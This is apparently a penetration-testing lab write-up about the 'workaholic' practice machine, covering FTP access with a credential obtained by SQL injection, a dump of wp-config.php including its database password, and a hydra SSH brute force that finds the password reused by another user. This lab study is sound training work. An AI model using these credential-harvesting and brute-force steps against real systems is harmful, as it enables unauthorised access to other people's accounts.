InfoSec LAB

workaholic_FTP

Created: 6 min read

FTP

Nmap discovered a FTP server on the port 21 of the 192.168.136.229 host. The running service is vsftpd 3.0.5

Null Session

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ ftp $IP         
Connected to 192.168.136.229.
220 (vsFTPd 3.0.5)
Name (192.168.136.229:kali): 
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> ^D
221 Goodbye.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ ftp ftp@$IP
Connected to 192.168.136.229.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> ^D
221 Goodbye.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ ftp anonymous@$IP         
Connected to 192.168.136.229.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> ^D
221 Goodbye.

The target FTP server does not allow anonymous access. A valid credential is required to further proceed.

ted Session

The credential of the ted user was exfiltrated and cracked from the SQL injection attack. Credential is also valid for the target FTP server.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ ftp ted@$IP                  
Connected to 192.168.136.229.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> rstatus
211-FTP server status:
     Connected to 192.168.45.182
     Logged in as ted
     TYPE: ASCII
     No session bandwidth limit
     Session timeout in seconds is 300
     Control connection is plain text
     Data connections will be plain text
     At session startup, client count was 1
     vsFTPd 3.0.5 - secure, fast, stable
211 End of status

Session established

WordPress Webroot

ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rwxr-xr-x    1 1002     1002          405 Mar 27 11:15 index.php
-rwxr-xr-x    1 1002     1002        19915 Mar 27 11:15 license.txt
-rwxr-xr-x    1 1002     1002         7409 Mar 27 11:15 readme.html
-rwxr-xr-x    1 1002     1002         7387 Mar 27 11:15 wp-activate.php
drwxr-xr-x    9 1002     1002         4096 Mar 27 11:15 wp-admin
-rwxr-xr-x    1 1002     1002          351 Mar 27 11:15 wp-blog-header.php
-rwxr-xr-x    1 1002     1002         2323 Mar 27 11:15 wp-comments-post.php
-rwxr-xr-x    1 1002     1002         3336 Mar 27 11:15 wp-config-sample.php
-rwxr-xr-x    1 1002     1002         3178 Mar 27 11:15 wp-config.php
drwxr-xr-x    5 1002     1002         4096 Mar 27 11:15 wp-content
-rwxr-xr-x    1 1002     1002         5617 Mar 27 11:15 wp-cron.php
drwxr-xr-x   30 1002     1002        12288 Mar 27 11:15 wp-includes
-rwxr-xr-x    1 1002     1002         2502 Mar 27 11:15 wp-links-opml.php
-rwxr-xr-x    1 1002     1002         3937 Mar 27 11:15 wp-load.php
-rwxr-xr-x    1 1002     1002        51367 Mar 27 11:15 wp-login.php
-rwxr-xr-x    1 1002     1002         8543 Mar 27 11:15 wp-mail.php
-rwxr-xr-x    1 1002     1002        29032 Mar 27 11:15 wp-settings.php
-rwxr-xr-x    1 1002     1002        34385 Mar 27 11:15 wp-signup.php
-rwxr-xr-x    1 1002     1002         5102 Mar 27 11:15 wp-trackback.php
-rwxr-xr-x    1 1002     1002         3246 Mar 27 11:15 xmlrpc.php
226 Directory send OK.

The target FTP server is mirroring the web root directory of the target WordPress instance.

Write Access

ftp> put test 
local: test remote: test
200 EPRT command successful. Consider using EPSV.
550 Permission denied.

Write access is not granted

wp-config.php
ftp> more wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
 
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
 
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
 
/** MySQL database password */
define( 'DB_PASSWORD', 'rU)tJnTw5*ShDt4nOx' );
 
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
 
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
 
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
 
/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '%|X7>+ujGW6aeD,T5$V,SdIJ4=G>Wx(,^W|U$)Zb[/3)-*[W:EK+AHH/V Zl?A+8');
define('SECURE_AUTH_KEY',  'lwvqDQt{~|2>9fSbs;^bt,wb+;<lXAr+P@R*/jS}-dqgG]Frb|0_&~!,`||=/o!w');
define('LOGGED_IN_KEY',    '~}m3syWu?K6{s}b`bRn|jf%*z.R<Uoi+RTH65i!y&Wi V)w=B3EzHf %j,+I41|o');
define('NONCE_KEY',        'n _Ay4Rxg&?HxS(WqfU&:-gbl$^~+!7V9@NQb%-{K[}d/i~+`U-1(fN8xb$47]mC');
define('AUTH_SALT',        'pEd>^-5$.Tu=H6(d_E]{6sTF_k!lSEztv,-zhzzPc<yPQqX1c;~irIHpKjj5ZxIE');
define('SECURE_AUTH_SALT', 'AjBwd3Sl{F0+C+3Ma~S9s3fG=-W?mt?x+3Z_3+2&.LCs|!n pX5|ta56$[0-t>bw');
define('LOGGED_IN_SALT',   ' :+Wl:8U!Jyd2zc wEqYKG}Ug?bQ!b$|_:ktrzixd-<,$]9Vl@($5+Gc9Xvx.(Gm');
define('NONCE_SALT',       'i#u-MwU.K;n-.,;GoISHB|l6,{p::ucK!XOUBq)vXj`^>=9 ;Z<[<nNhvvM(}-u~');
 
/**#@-*/
 
/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';
 
/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define('WP_DEBUG', false );
 
 
/* Add any custom values between this line and the "stop editing" line. */
 
 
 
/* That's all, stop editing! Happy publishing. */
 
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}
 
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

DB credential identified; wpadmin:rU)tJnTw5*ShDt4nOx

Password Reuse

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ hydra -L ./users.txt -P ./passwords.txt -I -t 64 ssh://$IP
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-27 17:16:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:4/p:3), ~1 try per task
[DATA] attacking ssh://192.168.136.229:22/
[22][ssh] host: 192.168.136.229   login: charlie   password: rU)tJnTw5*ShDt4nOx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-27 17:16:21

The DB password, rU)tJnTw5*ShDt4nOx, also belongs to the charlie user for SSH access.

Interactive Graph View

Backlinks